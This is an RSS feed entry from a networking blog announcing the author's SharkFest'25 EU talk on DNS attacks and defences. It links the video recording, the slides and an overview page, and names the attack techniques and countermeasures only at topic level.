					<description><![CDATA[<img width="300" height="169" src="https://weberblog.net/wp-content/uploads/2025/12/DNS-Security-@-SharkFest25-EU-featured-image-300x169.jpg" class="webfeedsFeaturedVisual wp-post-image" alt="" style="display: block; margin: auto; margin-bottom: 5px;max-width: 100%;" link_thumbnail="" decoding="async" loading="lazy" srcset="https://weberblog.net/wp-content/uploads/2025/12/DNS-Security-@-SharkFest25-EU-featured-image-300x169.jpg 300w, https://weberblog.net/wp-content/uploads/2025/12/DNS-Security-@-SharkFest25-EU-featured-image-1024x576.jpg 1024w, https://weberblog.net/wp-content/uploads/2025/12/DNS-Security-@-SharkFest25-EU-featured-image-768x432.jpg 768w, https://weberblog.net/wp-content/uploads/2025/12/DNS-Security-@-SharkFest25-EU-featured-image-1536x864.jpg 1536w, https://weberblog.net/wp-content/uploads/2025/12/DNS-Security-@-SharkFest25-EU-featured-image.jpg 1920w" sizes="auto, (max-width: 300px) 100vw, 300px" />I was presenting at the annual &#8220;Wireshark Developer and User Conference&#8220;, the SharkFest&#8217;25 EU, talking about &#8220;Securing DNS &#8211; Attacks and Defences&#8220;. It covered all the buzzwords related to DNS security, such as malware using DNS, DNS spoofing, DNS exfiltration &#38; tunnelling, while defending them with the keywords as DNSSEC, DoH/DoT, feeds &#38; blocklists, and &#8230; <a href="https://weberblog.net/dns-security-sharkfest25-eu/" class="more-link">Continue reading <span class="screen-reader-text">DNS Security @ SharkFest&#8217;25 EU</span> <span class="meta-nav">&#8594;</span></a>]]></description>
										<content:encoded><![CDATA[<img width="300" height="169" src="https://weberblog.net/wp-content/uploads/2025/12/DNS-Security-@-SharkFest25-EU-featured-image-300x169.jpg" class="webfeedsFeaturedVisual wp-post-image" alt="" style="display: block; margin: auto; margin-bottom: 5px;max-width: 100%;" link_thumbnail="" decoding="async" loading="lazy" srcset="https://weberblog.net/wp-content/uploads/2025/12/DNS-Security-@-SharkFest25-EU-featured-image-300x169.jpg 300w, https://weberblog.net/wp-content/uploads/2025/12/DNS-Security-@-SharkFest25-EU-featured-image-1024x576.jpg 1024w, https://weberblog.net/wp-content/uploads/2025/12/DNS-Security-@-SharkFest25-EU-featured-image-768x432.jpg 768w, https://weberblog.net/wp-content/uploads/2025/12/DNS-Security-@-SharkFest25-EU-featured-image-1536x864.jpg 1536w, https://weberblog.net/wp-content/uploads/2025/12/DNS-Security-@-SharkFest25-EU-featured-image.jpg 1920w" sizes="auto, (max-width: 300px) 100vw, 300px" /><p>I was presenting at the annual &#8220;<a href="https://sharkfest.wireshark.org/" target="_blank" rel="noopener">Wireshark Developer and User Conference</a>&#8220;, the <a href="https://sharkfest.wireshark.org/retrospective/sfeu/sf25eu/" target="_blank" rel="noopener">SharkFest&#8217;25 EU</a>, talking about &#8220;<strong>Securing DNS &#8211; Attacks and Defences</strong>&#8220;. It covered all the buzzwords related to DNS security, such as malware using DNS, DNS spoofing, DNS exfiltration &amp; tunnelling, while defending them with the keywords as DNSSEC, DoH/DoT, feeds &amp; blocklists, and so on.</p>
<p>Quite many techniques. ;) Luckily, <strong>the whole session was recorded</strong>. So if you&#8217;re interested, have a look!</p>
<p><span id="more-14133"></span></p>
<div style="margin-bottom:24px"><a href="https://weberblog.net/network-traffic-tapping" target="_blank" rel="noopener"><img decoding="async" class="aligncenter size-full" src="https://weberblog.net/wp-content/uploads/2026/05/Banner_PacketRaven.1208x232.webp" /></a></div>
<div class="su-quote su-quote-style-default"><div class="su-quote-inner su-u-clearfix su-u-trim">DNS is a foundational part of the Internet &#8211; but also a prime target for attackers. In this talk, we dive into common DNS attack vectors like spoofing, command-and-control traffic via DNS, or DNS tunnelling. We&#8217;ll explore modern defence mechanisms such as DNSSEC, DNS-over-HTTPS (DoH), and DNS-over-TLS (DoT), and how they help protect DNS integrity and privacy. You&#8217;ll also get insights into leveraging threat intel and malware feeds to detect malicious domains, plus a look at useful tools for DNS troubleshooting and analysis.</div></div>
<p><iframe loading="lazy" title="08: Secure DNS: Attacks and Defenses | Learn Wireshark with Johannes Weber @ SF25EU" width="604" height="340" src="https://www.youtube.com/embed/79m21tA_9Hs?feature=oembed" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share" referrerpolicy="strict-origin-when-cross-origin" allowfullscreen></iframe></p>
<p>Here are the slides (PDF):</p>
<p><a href="https://weberblog.net/wp-content/uploads/2025/12/SharkFest25-EUROPE-Johannes-Weber-Secure-DNS.pdf"><img loading="lazy" decoding="async" class="aligncenter size-full wp-image-5570" src="https://weberblog.net/wp-content/uploads/2014/07/download-buttons01.png" alt="" width="158" height="45" /></a></p>
<p>At the end of the talk, I showed a summary of all DNS security attack vectors and countermeasures. <a href="https://weberblog.net/dns-security-overview/">If you&#8217;re interested in this “simple” overview, you can find it here.</a></p>
<p>If you have any comments or questions, please go ahead and use the comment function. ;)</p>
<p>Me in action 😂:</p>

<a href='https://weberblog.net/wp-content/uploads/2025/12/Johannes-Weber-SharkFest25-EU-1.jpg'><img loading="lazy" decoding="async" width="300" height="225" src="https://weberblog.net/wp-content/uploads/2025/12/Johannes-Weber-SharkFest25-EU-1-300x225.jpg" class="attachment-medium size-medium" alt="" srcset="https://weberblog.net/wp-content/uploads/2025/12/Johannes-Weber-SharkFest25-EU-1-300x225.jpg 300w, https://weberblog.net/wp-content/uploads/2025/12/Johannes-Weber-SharkFest25-EU-1-1024x768.jpg 1024w, https://weberblog.net/wp-content/uploads/2025/12/Johannes-Weber-SharkFest25-EU-1-768x576.jpg 768w, https://weberblog.net/wp-content/uploads/2025/12/Johannes-Weber-SharkFest25-EU-1.jpg 1210w" sizes="auto, (max-width: 300px) 100vw, 300px" /></a>
<a href='https://weberblog.net/wp-content/uploads/2025/12/Johannes-Weber-SharkFest25-EU-2.jpg'><img loading="lazy" decoding="async" width="300" height="225" src="https://weberblog.net/wp-content/uploads/2025/12/Johannes-Weber-SharkFest25-EU-2-300x225.jpg" class="attachment-medium size-medium" alt="" srcset="https://weberblog.net/wp-content/uploads/2025/12/Johannes-Weber-SharkFest25-EU-2-300x225.jpg 300w, https://weberblog.net/wp-content/uploads/2025/12/Johannes-Weber-SharkFest25-EU-2-1024x768.jpg 1024w, https://weberblog.net/wp-content/uploads/2025/12/Johannes-Weber-SharkFest25-EU-2-768x576.jpg 768w, https://weberblog.net/wp-content/uploads/2025/12/Johannes-Weber-SharkFest25-EU-2.jpg 1210w" sizes="auto, (max-width: 300px) 100vw, 300px" /></a>

<p><span class="text-Kvkr6N truncate-Pc_c1s textS-BC51wP">Photo by <a href="https://unsplash.com/@pconrad?utm_source=unsplash&amp;utm_medium=referral&amp;utm_content=creditCopyText">Peter Conrad</a> on <a href="https://unsplash.com/photos/a-red-security-sign-and-a-blue-security-sign-UA8PwPht1Vw?utm_source=unsplash&amp;utm_medium=referral&amp;utm_content=creditCopyText">Unsplash</a></span>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://weberblog.net/dns-security-sharkfest25-eu/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
		<post-id xmlns="com-wordpress:feed-additions:1">14133</post-id>	</item>
	</channel>
</rss>
